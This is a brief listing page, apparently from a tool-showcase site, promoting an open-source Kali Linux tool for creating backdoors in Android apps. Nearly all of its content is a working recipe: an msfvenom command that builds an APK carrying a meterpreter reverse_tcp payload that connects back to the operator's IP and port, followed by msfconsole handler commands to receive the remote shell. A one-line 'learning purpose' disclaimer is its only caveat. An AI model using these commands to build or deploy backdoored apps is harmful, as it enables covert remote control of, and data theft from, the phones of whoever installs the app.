Featured on Sep 18th, 2018

Android Backdoor

msfvenom-backdoor-android

CHECK IT OUT

Open source kali linux tool for creating back door in android.

cmd:

$msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk

It will generate resultapk file which is back door.
In LHOST set your ip
and in your LPORT set your port which is open

For exploit use this cmd :

$msfconsole
$use exploit/multi/handler
$set payload android/meterpreter/reverse_tcp
$set LHOST 192.168.178.30
$set LPORT 4444
$exploit

Use only for learning purpose

here is the github link

Hunted by @spyder896

$0.32·14 votes· comments